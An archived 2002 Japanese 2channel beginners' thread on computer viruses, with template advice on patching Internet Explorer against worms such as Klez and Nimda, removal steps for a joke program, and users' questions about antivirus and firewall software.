1 :
ひよこ名無しさん :
02/07/01 00:47 ID:B6kpRAqc ■■ウィルス関連の質問・相談はこのスレッドでどうぞ■■
※質問の前に、必ず
>>1-16 を読んで下さい。
初心者の皆さん、コンピューターウィルス対策は万全ですか?
今こうして2chを見ているということはインターネットを利用しているということ。
だったら「いつ、どこで」ウィルスに感染してしまうかもしれません!
◇インターネット上の怪しいファイルをダウンロードしたり、電子メールで
届いた添付ファイルにはウィルスが混入しているかも...注意しましょう!
★IPAセキュリティセンター:
http://www.ipa.go.jp/security/index.html など、ウィルス情報を扱っているホームページを見て、ウィルスに関する
理解を深めるのも良いでしょう。
★コンピュータウイルス110番:IPAセキュリティセンターが設置している
電話相談です。コンピュータウィルスに関連のあることは何でも相談可です。
→詳しくはIPAのホームページで
リンクがずれる事があります。
またスレッド作成時との時間差により最新情報と食い違う点もあるかと思います。
あらかじめ、ご了承下さい。
>>2 今すぐウィルススキャンを実行してみよう
>>3 ウィルス定義データは定期的に更新しよう / ワクチンメーカーリンク集
>>4 最近よくみられるウィルスに関して
>>5 ウィルスに感染しないために / ウィルスを発見・感染したら届け出を!
>>6-9 【危険】最新流行中のウィルス!
>>10-14 最近の代表的なウィルスFAQと流行の恐れあるウィルスについて
>>15 メーラー「Becky!」への影響について
>>16 ウィルスの事で悩んでる人へ / 過去ログ コンピュータウィルス総合スレッドVol.1〜19
スレッドを立てる時に邪魔されてるかもしれないので、ズレてるかも。
まとめて全部読む時は
>>1-20 (←ここをクリック)あたりで読めます。
ミラーサイトはこちら
http://pcqa.tripod.co.jp/virus.htm (全部読めます)
2 :
ひよこ名無しさん :02/07/01 00:47 ID:B6kpRAqc
3 :
ひよこ名無しさん :02/07/01 00:47 ID:B6kpRAqc
4 :
ひよこ名無しさん :02/07/01 00:48 ID:B6kpRAqc
5 :
ひよこ名無しさん :02/07/01 00:48 ID:B6kpRAqc
■■ウィルスに感染しないために■■
★ウィルス監視ソフトを常駐させよう。
→常に見張っていてくれる監視ソフトを導入すれば、
あなたの負担もグッと減ります。
★知らない人から届いた添付ファイルに注意!
→知らない人からファイルをもらう理由はありません。
★添付ファイルのファイル名だけで信用しない!
→ファイル名だけでは中身は分かりません。
★知り合いからの添付ファイルでも、注意しよう!
→アドレス帳に登録されている人に送信するウィルスもあるので
注意が必要です。
★怪しいファイルをダウンロードしない。
→怪しいファイルにウィルスが混入しているケースもよくあることです。
怪しいファイルや違法性のあるファイルはダウンロードしないようにしましょう。
■■ウィルスを発見・感染したら届け出を! ■■
もしウィルスを発見したり、感染してしまったら届け出をしましょう!
★IPAセキュリティセンター
コンピュータウイルスに関する届出について
http://www.ipa.go.jp/security/outline/todokede-j.html こちらに届け出の方法などが記載されています。E-mail・郵送・FAXが
利用できますので、ぜひ届け出ましょう。
※IPAセキュリティセンターのコメント(転載)
届出は、感染被害の拡大と再発防止のための大変貴重な資料となります。
記載されているプライバシーに関する情報を公表することはありませんので、
届出へのご協力をお願いいたします。
6 :
ひよこ名無しさん :02/07/01 00:49 ID:B6kpRAqc
7 :
:02/07/01 00:51 ID:???
【危険】最新流行中のウィルス!その2 ■■whatever.exeが届いたら要注意!■■ W32/Alizウイルスが世界的規模で急激に勢いを増しています。 このウイルスは、InternetExplorerのセキュリティホールを悪用しているため、 Outlookではメールを開いただけで、OutlookExpressではプレビューしただけで 感染します。 ウイルス定義ファイルを更新し、最新ウイルスに備えておくとともに、 InternetExplorer、Outlook/OutlookExpressのセキュリティホールを 潰す必要があります。 ●予防策 ★ブラウザ(InternetExplorer)にパッチを適用する InternetExplorer 5.01の場合、SP2を適用する。 ※ 但し、5.01はサポートが打ち切られているので5.5SP2以上を推奨 InternetExplorer 5.5の場合、SP2を適用する。 あるいは最新の InternetExplorer 6.0 をインストールする。 (注:必ず、Outlook Expressを含む標準構成以上で) ●説明 W32/Alizウイルスは、Windows系OSで動作するとOutlookExpressのアドレス帳に 登録されている全てのアドレス宛にウイルスを添付したメールを送信します。 送信されるメールの内容は次のとおりです。
8 :
:02/07/01 00:52 ID:???
【危険】最新流行中のウィルス!その3 ■■新種ウイルス「W32/Klez」に注意を!■■ W32/Klezウイルスは、InternetExplorerの既知のセキュリティホールを 悪用したウイルスで、メールの添付ファイルを介して感染を拡げます。 このウイルスが添付されたメールを受け取ると、Outlookでは メールを開いただけで、OutlookExpressではプレビューしただけで感染します。 ●予防策 ★ブラウザ(InternetExplorer)にパッチを適用する。 InternetExplorer 5.01の場合、SP2 を適用する。 ※但し、5.01はサポートが打ち切られているので5.5SP2以上を推奨 InternetExplorer 5.5 の場合、SP2 を適用する。 あるいは最新の InternetExplorer 6.0 をインストールする。 (注:必ず、Outlook Expressを含む標準構成以上で) ●説明 このウイルスに感染すると、Outlookのアドレス帳に登録されている 全てのアドレス宛にウイルスを添付したメールを送信します。 送信者のアドレス欄には、ウイルスが作成した架空のアドレスが 記載されます。送信されるメールの内容は次のとおりです。 ・件名:Hi 他 ・本文:I'm sorry to do so,but it's helpless to say sorry. I want a good job,I must support my parents.
9 :
:02/07/01 00:52 ID:???
10 :
:02/07/01 00:52 ID:???
11 :
:02/07/01 00:53 ID:???
12 :
:02/07/01 00:53 ID:???
■■ウイルス『Badtrans.B』FAQ■■
Q1:ウィルス付きメールを開いただけで感染しますか?
A1:メールソフトにOutlook ExpressまたはOutlookを利用し、
かつInternet ExplorerがSP2でない場合は、メールを見るだけで感染します。
Internet Explorerのバージョンはヘルプ>バージョン情報で確認
下記ページにてbuild番号とバージョンを確認
http://www.geocities.co.jp/Technopolis/2082/Soft/Ie/OE5str.htm#ieoeversion Q2:SP2はどこからDL出来ますか?
A2:Windows Update、及び下記のサイトから
http://www.microsoft.com/windows/ie_intl/ja/download/ 回線に種類にもよりますが、DLにはかなりの時間を要します。
Q3:IE5.01SP2と5.5SP2のどちらが良いですか?
A3:5.01SP2はサポートが打ち切られているので、5.5SP2、または 6
(標準構成以上) がよろしいかと思います。
Q4:SP2を導入したらウィルスには感染しませんか?
A4:メールを見ただけでの感染は防げます。メールに添付されたファイルを
開いた(実行した)場合は感染します。
Q5:メールソフトにOutlook Expressを使用して無い場合は、感染しませんか?
A5:メールを見るだけでは感染しませんが、ウィルス付ファイルを実行したら
感染します。
■■『MADOKA』・『OZAWA』について■■
これはトロイの木馬と呼ばれるバックドア型ハッキングツールと診断
されていましたが、実際にはトロイ活動は無いジョークだということに
なっています。
最近、2ch内で直リンされることが多く、かなりの感染者が出ています。
<<感染ルート>>
madoka.zipなどをダウンロードし、解凍・実行することで感染します
<<感染するとどうなるのか>>
・突然、女性の顔写真が画面いっぱいに表示されます。
・システム起動時にこのプログラムが実行されるようシステムを改変します。
<<詳細情報>>
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JOKE_MADO.A <<駆除方法>>
1.PC起動時に「F8」キーを連打してセーフモードで起動
2.「スタート」-「検索」-「ファイルやフォルダ」でmadoka.exe、madoka.log、
ozawa.exe、ozawa.logを検索し削除
(madoka.log、ozawa.logは無いかもしれないので無ければ気にしない)
3.Windows98の場合はC:\Windows\win.iniを開き、run=ozawa.exeと書かれて
いるところの ozawa.exe の部分を消去し上書き保存
(Windows2000の場合はC:\WINNT\win.iniだと思われるが未確認。
win.iniに上記のrun=ozawa.exeが記入されてるかは不明)
4.PCを通常起動で駆除終了
■■ウイルス『Nimda』FAQ■■
Q1:Webを閲覧しただけで感染しますか?
A1:Internet Explorerのバージョンによります。
5.0及び5.5の場合はSP2(サービスパック2)をインストールして下さい。
※但し、5.01はサポートが打ち切られているので5.5SP2以上を推奨
Internet Explorerのバージョンはヘルプ>バージョン情報で確認
下記ページにてbuild番号とバージョンを確認
http://www.geocities.co.jp/Technopolis/2082/Soft/Ie/OE5str.htm#ieoeversion Q2:SP2はどこからDL出来ますか?
A2:Windows Update、及び下記のサイトから
http://www.microsoft.com/windows/ie_intl/ja/download/ 回線に種類にもよりますが、DLにはかなりの時間を要します。
Q3:IE5.01SP2と5.5SP2のどちらが良いですか?
A3:Win98ならば5.01SP2、WinMeなら5.5SP2がよろしいかと思います。
※但し、5.01はサポートが打ち切られているので5.5SP2以上を推奨
Q4:SP2を導入したらウィルスには感染しませんか?
A4:Webを見ただけでの感染は防げます。メールに添付されたファイルや
DLしたファイルを開いた場合は感染します。
Q5:感染の有無はどうしたら分りますか?
A5:『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
*.emlが大量にHITした際は確定。
Q6:感染した場合、どのような症状がでますか?
A6:ウイルス付メールの自動送信やCドライブをネットワーク共有にしてしまいます。
詳しくは下記のサイトで確認してください。
http://www.symantec.com/region/jp/sarcj/data/w/[email protected] http://www.trendmicro.co.jp/virusinfo/troj_nimda.htm Q7:ウィルス付きメールを開いただけで感染しますか?
A7:メールソフトにOutlook ExpressまたはOutlookを利用し、
かつInternet ExplorerがSP2でない場合は、メールを見るだけで感染します。
Q8:メールソフトにOutlook Expressを使用して無い場合は、感染しませんか?
A8:メールを見るだけでは感染しませんが、ウィルス付ファイルを実行したら
感染します。
Q9:感染した場合はどうすれば良いですか?
A9:インターネットへの接続を控えて、検索でヒットした『readme.exe』『MEP51B3.TMP.EXE』を
削除してください。ワクチンソフトを所持していない場合は、
速やかにお店にダッシュして、購入してきてださい。
ワクチンソフトのウィルス定義ファイルを最新のものに更新、
ウィルススキャンをしてください。
15 :
:02/07/01 00:54 ID:???
■■『MADOKA』・『OZAWA』について■■
これはトロイの木馬と呼ばれるバックドア型ハッキングツールと診断
されていましたが、実際にはトロイ活動は無いジョークだということに
なっています。
最近、2ch内で直リンされることが多く、かなりの感染者が出ています。
<<感染ルート>>
madoka.zipなどをダウンロードし、解凍・実行することで感染します
<<感染するとどうなるのか>>
・突然、女性の顔写真が画面いっぱいに表示されます。
・システム起動時にこのプログラムが実行されるようシステムを改変します。
<<詳細情報>>
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JOKE_MADO.A <<駆除方法>>
1.PC起動時に「F8」キーを連打してセーフモードで起動
2.「スタート」-「検索」-「ファイルやフォルダ」でmadoka.exe、madoka.log、
ozawa.exe、ozawa.logを検索し削除
(madoka.log、ozawa.logは無いかもしれないので無ければ気にしない)
3.Windows98の場合はC:\Windows\win.iniを開き、run=ozawa.exeと書かれて
いるところの ozawa.exe の部分を消去し上書き保存
(Windows2000の場合はC:\WINNT\win.iniだと思われるが未確認。
win.iniに上記のrun=ozawa.exeが記入されてるかは不明)
4.PCを通常起動で駆除終了
■■Becky!への影響について■■ もちろんOutlookExpressじゃなくてもHTMLメールが開けるなら注意。 Becky!についてもリムアーツのページに警告が乗ってたので転載。 【2001/11/26 PCウイルス「Aliz」「Badtrans」等のBecky!への影響について。】 これらのウイルスはインターネットエクスプローラのセキュリティホールを突くもので、 その意味ではNimdaと同質のものです。IEのセキュリティアップデートは、 必ず実行しておいて下さい。 また、「全般的な設定」「HTMLの表示」の項で、「MSIEコンポーネントを使用」の チェックをはずしていれば、HTMLのメールが添付として扱われますので、 それをダブルクリックしない限り感染することはありません。 不安な方は、このオプションをOFFにして置かれることをお勧めします。 ※ウイルス対策ソフトが他のメールも含めて受信箱のメールを削除してしまうという トラブルに対処するため、急遽、2.00.08が公開されています。
18 :
:02/07/01 00:58 ID:???
お疲れ。途中で止まってたから規制に会ってんだろうと思って13〜投稿したらかぶったよ。
じっと待つのが(・∀・)イイ! ともかくお疲れ
21 :
:02/07/01 01:08 ID:B6kpRAqc
>>19 もたついて申し訳無いでつ。
因みに前スレの950なんですけどあの流れだと立てちゃ不味かったですか。
このスレ、テンプレが多すぎる・・・
24 :
19 :02/07/01 01:12 ID:???
>>21 全然まずくないよー。でも連続投稿で規制に遭うの知ってたから一人でやっても
上手くいかないだろうと思っちゃって。(前スレ二人掛かりで立ててんのを傍観してた)
邪魔してスマソ。
このスレも初代からしばらくは
>>1-7 で済んでたんだけどなー
スレ立て、もつかれさま!
27 :
ひよこ名無しさん :02/07/01 01:45 ID:5F87GT+j
へんな添付ファイルがついたメールが大量にきます。 勝手に画像ファイルが開いて「この画像は表示できません」というメッセージ。 なんのウイルスでしょうか?
>>27 ウィルスチェックすれ
プレビュー切れ
>>27 画像のふりしたウイルスじゃねえの?
ウイルス対策ソフト入れてない人は質問しないでね
31 :
ひよこ名無しさん :02/07/01 01:50 ID:5F87GT+j
削除したからかウイルススキャンには引っかからなかった。 参加しているMLから大量に来るんだけど そこでウイルスメールがでまわってますと言っていたから。
マカフィー、ノートン、ウイルスバスター 結局どれがベストなの??
一応、Norton Anti Virus2002がBest。 BetterがVirusBuster2002。 マの字は糞以下と言うことにこの板的にはなっていますな。
36 :
定説 :02/07/01 10:15 ID:???
ノートン>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> バスター>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>クソースネクストバカフィー >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>ウイルス警備隊
ってどうなの?
何でそんなにマカフィーはダメなのレスか??
でもバカフィーってシェア世界一なんでしょ? ダメなのに皆使ってんの??
>>38 マカヒーを入れると、いろいろな障害がおきるから。
マカフィーはクソ!!
>>39 バカフィーはパソコンを買うとプリインストールされていることが多いから、
確かに出荷数はNo1かもしれないがな。
確かにオレも、プリインされてたマカフィーの定義ファイルを更新したら、 エラーが起きるようになったな。 まあ、プリインされてた奴だから、と思ってあきらめたんだが、 こういう障害は日常茶飯事なのですか?バカフィーでは。
46 :
モウ!! :02/07/01 17:22 ID:gqs4ZcCe
今日、「.jpg」ファイルを開いたら たくさん、インターネットエクスプローラのウィンドウが開いたり アウトルックがたくさん開いたりしたんです。 コレってやばいですか? 一応ノートンを起動させているのですが・・・
48 :
47 :02/07/01 17:36 ID:???
>>46 「ブラクラでヤバい!」とかのブラクラチェッカー入れたら?
50 :
ひよこ名無しさん :02/07/01 19:31 ID:ToCKsIZS
>>46 ただのJavaScriptだから全く心配いらん。
そういう危険なの見てるんなら一応JavaScriptはoffにしとけ。
自分のPCがウィルスに感染しているかどうかを 知るにはどうしたら良いですか? 急にウィルスメールが届きだしたので困っています。
>>51 とっととウィルススキャンしろ。ソフトがなきゃさっさと買ってこい。
>>51 ウイルシ対策ソフト入れてない香具師は、(・∀・)カエレ!!
55 :
ひよこ名無しさん :02/07/01 20:26 ID:FIiD+evm
つーか、何故マルチでネタ野郎の
>>51 にレスしてるの?
>>56 しまった!釣られたか ! ? 欝だ・・・
(^○^)ゲラゲラ アホガミ-ル- ブタノケ-ツ-
( ´,_ゝ`)プッ
60 :
ひよこ名無しさん :02/07/01 22:56 ID:bEGtgYoe
X97M_LAROUX.A というウイルスに感染したのでウイルスバスターで駆除してもう「ウイルスが発見されました」って表示が出なくなったのに、エクセルを開くたびに「ウイルスを発見しました」と表示されます。 ネットで見当たる対処はしてみたのですが何も変わりません。どうしたらよいでしょうか?
今まで共に暮らしてきたフォントが突然使用不可になってしまいました 消えたのか?と思いコントロールパネルから逝ける『フォント』を開いたのですが 何故か消えてはなく全て無事なのです。はてな。 ボスケテー
62 :
ひよこ名無しさん :02/07/01 23:01 ID:O3gxAFZz
FAQやスレ違いの質問を平気でかます奴、直前のレスを読まない奴、 IDを出さない奴、「初心者です」とか抜かす奴。 上記に当てはまる奴は、多くの場合マルチポスター。
age
69 :
ひよこ名無しさん :02/07/02 09:31 ID:oeuPsVMj
受信箱からウイルスメールを削除する方法を教えてくらさい。 選択→右クリック→削除をするんですが、 不正が行われたので強制終了!ってなるんです。 どうしたらいいの?
>>69 これから特定のアプリについて質問する時は、アプリの名称とバージョンを書いてね。
あなたはそのソフトしか使ってないかも知れないけど、同じ用途に別のソフトを
使ってる人だって大勢いるのよ。
前置きはこのくらいにして、ソフトがOutlookExpressとしてなら、メールをクリック
ツールバーの赤い×をクリックとか、削除済みアイテムフォルダへドラッグするとか、
別の方法を試してみて。それでも強制終了するなら、一度データをバックアップして
メールソフト(メーラー)をアンインストールし、インストールしなおしてみてね。
72 :
ひよこ名無しさん :02/07/02 15:25 ID:loDhX9Ej
昨日W32.Elkern is a dangerous virus ・・というメールがいきなり届いたので オンラインスキャンしたところクレズが駆除されましたというようなことになったのですが、 これで大丈夫なんでしょうか?さっきオンラインスキャンする前に知人にメールを 送ったら、返事が英語になってたんです。
73 :
ひよこ名無しさん :02/07/02 15:55 ID:wIMCPREM
W95MTX.drのウイルスの詳しいことを教えて下さい 故意に送られてきているような気がして・・・・ ノートンをいれていたので感染は防げました
>73 ノートンの会社に逝って調べてください
75 :
ひよこ名無しさん :02/07/02 16:50 ID:wIMCPREM
76 :
ひよこ名無しさん :02/07/02 17:59 ID:eatHkgFO
やっとお金が貯まったので、今ウイルスバスターを買ってきました。 win98 で IE5.5 SP2 です。(この説明でいいのでしょうか) 前にここで教えてもらって、Zone Alarmをインストール してあるんですけれど、ウイルスバスターをインストールする前に こっちはアンインストールした方がいいんですか?? どなたかよろしくお願いしますです。
>>76 ノートンかバスター、多分バスターの方だったとは思うのですが
それをアンインストールしないとインストールできないYO!って警告の出る方が
あったような気がします。とりあえずはそのまま入れて、警告が出たらアンインストールしてみては?
78 :
76 :02/07/02 18:03 ID:eatHkgFO
即レスありがというございます! 晩ご飯食べたらゆっくりやってみようと思います!
79 :
ひよこ名無しさん :02/07/02 18:18 ID:wkrAwbAr
今さっきノートンのダイアログ?が出てJS何とかって言うのに感染してる って言われたのですが自動的に修復するはずなのにアクセスは拒否されました たというのが2,3回出て消えたのでシステムのスキャンやっても引っかからないいんですが どうなってしまったんですか?
80 :
ひよこ名無しさん :02/07/02 18:26 ID:wkrAwbAr
79の訂正 ×拒否されましたたというのが2,3回出て消えたのでシステムのスキャンやっても引っかからないいんですが ○拒否されましたというのが2,3回出て消えてしまったので不安になりシステムのスキャンをしたのですが引っかかりません すみません。
82 :
76 :02/07/02 19:34 ID:SAHC0+sE
ウイルスの話とはちょっとずれているのかもしれないですが、 Zone Alarm のアンインストールが良くわからなくて困ってます。 英語ちんぷんかんぷん…(´д`;) どなたか助けてください、お願いします。。。
>>80 あー、多分それは2chのどっかにvbsスクリプトが張ってあったからかも
IEの一時ファイル(キャッシュ)を削除してみそ
>>82 アプリケーションの追加と削除に無いか?
つーか、あれは普通日本語化して使わない?
日本語化できるので、みんなが使っているのだが・・・
ウィルスバスターのFirewall機能を使わなければ別に削除しなくていい
むしろバスターの機能を殺してZAでも使ったほうがいい
> ★これらのURLはHDDを綺麗サッパリ消去してくれるので絶対踏まない事!! > 〜//80s/puolnau/syokusya.zip 俺、手もとの1台をクリーンインストールしようと思ってるんで、 URLの前半も教えてくれんかの。試してみたい。
87 :
80 :02/07/02 20:15 ID:wkrAwbAr
皆さんありがとうございました!! 84見て解決しました!!
88 :
76 :02/07/02 20:26 ID:e+zCoNUz
>83さん そうなんですよね…、日本語化できるようにしなかったんです(;_;) 今なんとかアンインストールできたみたいです。 でも、ガーン…、ZAの方がよかったんですか…。 どこかで、ZAはふつうのアンインストールだけじゃ 完全にアンインストールはできないって読んだような気がしたんですけど…。 本当ですか??
>>89 Outpost Firewall FREE (・∀・)イイ!!
>>90 やっぱり良いですか?それにしてもZAが完全にアンインストール出来ないとなると
困るなぁ(笑)ちょっと調べてみるか…
92 :
:02/07/02 20:37 ID:oxXUkSjP
Norton Antivirus2002の製品登録をシマンテックのウェブサイトで行いました。 今日、シマンテックカスタマーサービスセンターから、 登録完了のお知らせのメールが来たのですが、 Norton AntiVurusの ヘルプ>製品登録 では、まだ未登録になっています。 どうすれば登録したことを入力できるのでしょうか?
>>92 LiveUpdeして、ウイルス定義ファイルが更新されてたらほっとけば?
>>94 LiveUpde ×
LiveUpdate ○
( ´,_ゝ`) プッ
99 :
92 :02/07/02 21:00 ID:oxXUkSjP
>>93-95 ありがとうございます。
ウィルス定義ファイルは 02/06/26 になっていますが良いのでしょうか?
100 :
88 :02/07/02 21:01 ID:pW1MDZdx
>96さん そうそう、こういうやつでした。 で、バスター2002をいれたんです、私。 aの基本的なアンインストールをしちゃったんですが、 これじゃぁ完全ではないってことですよね? bで書いてあることがイマイチ良くわからないのですが、 もうちょっと優しく解説してもらうことはできないでしょうか…(;_;)
>>100 いや、あそこの解説以上に優しくと言われましても…
とりあえずもう一度ZONE Alarmインストールして、bを熟読したら特に
難しいところはないと思いますけど…どこがわからないの?
102 :
88 :02/07/02 21:14 ID:pW1MDZdx
>100さん そうですよね。。。 もういちどインストールしてみます。 bの、「なお、実際問題としては・・・」の前までの部分を 行えばオーケーってことでいいんですよ…ね?? なんども申し訳ありませんです。
>>102 そうですそうです。bのやり方で競合するファイルも削除されるってことですから。
104 :
88 :02/07/02 21:25 ID:pW1MDZdx
>103 ああぁ、ほんとに何度もすみません。 今、ZAをダウンロードしてるんですけれど、 バスターをインストールしてあるのに、他のファイアーウォールの インストールを行っても平気なんですか??
>>104 複数併用したこと無いので何とも言えませんが、気になるならそちらも
アンインストールしてからの方が良いかもね。
106 :
88 :02/07/02 21:35 ID:pW1MDZdx
>104 今いそいでバスターの方をアンインストールしたんですが、 ちょっと間に合わなかったらしく、バスターでZAのインストールができなかった みたいです。。。もいちどやってみます。。。(;_;)
107 :
88 :02/07/02 22:37 ID:+4xdRFLa
荒岸さま いろいろとありがとうございました!! なんとかアンインストール&インストールできたようです。 今、全ドライブ検索してます。本当に色々とお世話になリました。
110 :
age :02/07/03 11:09 ID:???
Received:from imlmta03.aics.ne.jp(157.205.253.215)
by ** with SMTP; **
Received:from virmta04.aics.ne.jp ([157.205.253.132])
by imlmta03.aics.ne.jp (InterMail vM.5.01.03.13
201-253-122-118-113-20010918) with ESMTP id < 20020703004602_IOPO18809_imlmta03_aics_ne_jp_Virus_Deleted@virmta04.aics.ne.jp >
for<
[email protected] >; **
Received: from Zpkjjgmy ([61.124.120.25]) by virmta04.aics.ne.jp
(InterMail vM.5.01.03.13 201-253-122-118-113-20010918) with SMTP id < 20020703004519.SPIT20864.virmta04.aics.ne.jp_Virus_Deleted@virmta04.aics.ne.jp >
for<
[email protected] >; **
From:customer<
[email protected] >
To: 20020703004602_IOPO18809_imlmta03_aics_ne_jp_Virus_Deleted@aso.aics.ne.jp
20020703004519.SPIT20864.virmta04.aics.ne.jp_Virus_Deleted@aso.aics.ne.jp
[email protected] [email protected] Subject: A very powful tool
Message-Id:< 20020703004519_SPIT20864_virmta04_aics_ne_jp_Virus_Deleted@imlmta03.aics.ne.jp >
Date**
Hello,This is a special powful tool
I hope you would like it.
------------------ Virus Warning Message (on the network)
Found virus WORM_KLEZ.E in file BORDER.pif
The file is deleted.
---------------------------------------------
★ウイルスでしょうか?なんて悩んでる人は質問の前に
>>1-16 を読もう!
ウイルスにやられ、リカバリーを決意しました。 画像や文書はフロッピーで移せ、と言われて理解したのですが、 メール(OE)、メッセンジャー、お気に入りに入れている項目、その他のソフトのバックアップの取り方がどうしてもわかりません。。 あと、僕のPCにはもともとDVDが見れるソフト(powerDVD)が着いていたのですが、 リカバリーするとこれはなくなってしまうのでしょうか、、?? また、フレッツ接続ツールはどうなりますか?? わかる方、誰か教えて下さい!! <PC環境> ウィンドウズ98、SOTEC,PCstationのM250A
115 :
ひよこ名無しさん :02/07/04 04:33 ID:DnmDp5Zp
JS_EXCEPTIONとか貰うページを見て、NortonAntiVirusのウィンドウが開いたとき PCから「ギョッ」って音がするんですけど普通ですか?
「ギョッ」っておもろいな(W
117 :
ひよこ名無しさん :02/07/04 05:12 ID:DnmDp5Zp
>>116 しませんか?
HDDがなんかなってるのかな…
HDDが仕事してます。
>>113 マルチをしてしまったのだから自殺を決意しろ。氏ね!
120 :
ひよこ名無しさん :02/07/04 13:55 ID:NQqqK2S5
みなさんこんにちわ。 ウイルスに感染してしまったので対処法を教えてください VBS.Network これなんですが、調べると 1. Windows Explorerを使用して全ての検出されたファイルを削除する。 2. コンピュータを再起動する。 と、出るので、ファイルを検索して削除しようとすると システムファイルです、これを削除するとWindowsが 正しく作動しない恐れがあります と出るんです。 それでもこの通りにすればいいのでしょうか? ノートン先生も見つけ出してはくれたのですが 処置はしてくれませんでした。 みなさん、よろしくおねがいします。
>>120 検出ファイル名をフルパスで出してみて。
メールの送受信にOutLookを使っているんですけど、 日頃ユーザーを切り替えて(以下@A)、使い分けています。 今はAの方をメインユーザーに設定して使っています。 先日友人のパソコンが「Klez_E」に感染したそうです。 友人には@のアドレスを教えていたので、 @の方にウィルスメールが大量に溜まっていると重います。 重要なメールは@をよく使うので、 このまま受信ボタンを押さないわけにはいきません、、、、 とりあえず受信時にプレビュー画面を表示してしまう設定を 無効にしておけば良いのでしょうけれど、 今は起動時にAが開くようになっていますから、 @にユーザーを切り替えをしてそれらの設定をしなければなりません。 しかし@に切り替えた時点で 送受信〜開封まで行ってしまう設定になっているので怖いです。 このような状況で何か良い方法はないでしょうか。 やはり一度受信して感染してから駆除するしかないのでしょうか。
123 :
122 :02/07/04 14:12 ID:ca+kI3Xl
↑すみません。ID晒すの忘れてました。失礼しました。 お願いしまs。
124 :
ひよこ名無しさん :02/07/04 14:24 ID:NQqqK2S5
>>121 さん
遅くなってすいません
>>120 です。
C:\WINDOWS\Temporary Internet Files\Content.IE5
これだとおもいます。
よろしくおねがいします。
>>124 インターネットオプションからインターネット一時ファイルのクリアしてみて。
126 :
ひよこ名無しさん :02/07/04 14:31 ID:NQqqK2S5
>>125 さん
やりました、このあとどうすればいいのでしょうか。
よろしくおねがいします。
>>126 ノートン先生にもう一度ウィルスがいないか聞いてみて。結構頼りになりますよ。
いなかったらそれでOK
128 :
ひよこ名無しさん :02/07/04 14:34 ID:NQqqK2S5
>>127 さん
はい、やってみます、ありがとうございました
出来たら報告いたします。
いってきます。
129 :
ひよこ名無しさん :02/07/04 14:37 ID:iUzGBuHS
一時期2chで配られたマンキン.exeって ノートン先生のウィルスチェックで警告してくれますか?
>>123 nPOP等を使ってメールのヘッダだけ見てウィルス付臭いのを削除するとか
回線切ってメーラーの設定すれば?
131 :
ひよこ名無しさん :02/07/04 15:24 ID:ca+kI3Xl
>130 なるほどっ! ありがとうございます!
133 :
ひよこ名無しさん :02/07/04 16:33 ID:PGtuf70u
134 :
:02/07/04 16:38 ID:???
135 :
:02/07/04 16:40 ID:???
138 :
初心者 :02/07/04 20:19 ID:???
JS_NOCLOSE,Eというウイルスに感染してしまいました 今後僕は何をすればいいんでしょうか・・ なにもわかりません 対処法を教えてくれる人誰かいませんでしょうか・・
139 :
ひよこ名無しさん :02/07/04 20:23 ID:mlNiK4Aa
AntiVir という無料のアンチウィルスソフトをダウンロード したのですが、アイコンも設定画面も出てきません。 ちゃんと起動してるのでしょうか?してる気がしません・・・ 設定とかするはどうすればいいんでしょうか?
140 :
ひよこ名無しさん :02/07/04 20:27 ID:WD6R2HM+
141 :
ひよこ名無しさん :02/07/04 20:28 ID:WD6R2HM+
142 :
初心者 :02/07/04 20:29 ID:???
>>142 ネットするなら、ウイルシ対策ソフト入れないと・・・だめぽ。
145 :
ひよこ名無しさん :02/07/04 20:33 ID:WD6R2HM+
146 :
初心者 :02/07/04 20:33 ID:???
>>141 そこを見たのですが言ってることがよくわからなくて・・・
>>139 DLしたファイルをクリックして解凍なり起動なりしないとダメじゃないの
148 :
ひよこ名無しさん :02/07/04 20:37 ID:WD6R2HM+
150 :
ひよこ名無しさん :02/07/04 20:39 ID:WD6R2HM+
151 :
ひよこ名無しさん :02/07/04 20:55 ID:5crcXlWZ
ウイルス対策でダウンロードしたのですがなぜかエラー。 そのままにしていたのですが、最近PCが変なんです。 ADSLなんですが、電源が入っていないPCが突然つくんです! 電源入れてないのに!何ででしょう??
152 :
139 :02/07/04 20:55 ID:mlNiK4Aa
もう一回、ダウンロードしようとしたら 画面が重くて動かなくなったので、 ウィルスバスター体験版をダウンロードしました。 が、特にアイコンや起動画面がありません。 download programfileにはウィルスバスターという 名前がありました。なぜかantivirらしい物はありません でした・・? ウィルスバスター体験版は確実にインストールしてます。 が、タスクバーにも常駐してません。設定とかはどこでするのでしょうか? どこにダウンロードされたのでしょうか?特に指定がなかった のでどこにあるかわかりません。。
>>151 5W1Hが全然ダメ。何をダウンロードしたの?
エラーメッセージは?
あと、BIOSでwake up on LANをDisableに。
154 :
ひよこ名無しさん :02/07/04 21:01 ID:5crcXlWZ
>>153 今手元に無いのでわかりません。
一番心配なのは、誰かがPCに入っているデータを盗んでいるのではということです。
リモートコントロールで電源をいれてるのか??と思って…。
そういうことってできるんですか?
>>154 ここに似たような質問が結構来ますが、520%無いです。
技術的に可能ですけど、貴方がペリカン文書でも握ってるならまだしも
貴方のPCには国家機密とか入ってますか?
まぁあれですね、一人暮らしで勝手に電源が入ってるなら警察に連絡。
同居ならカジュアルハッキング。
157 :
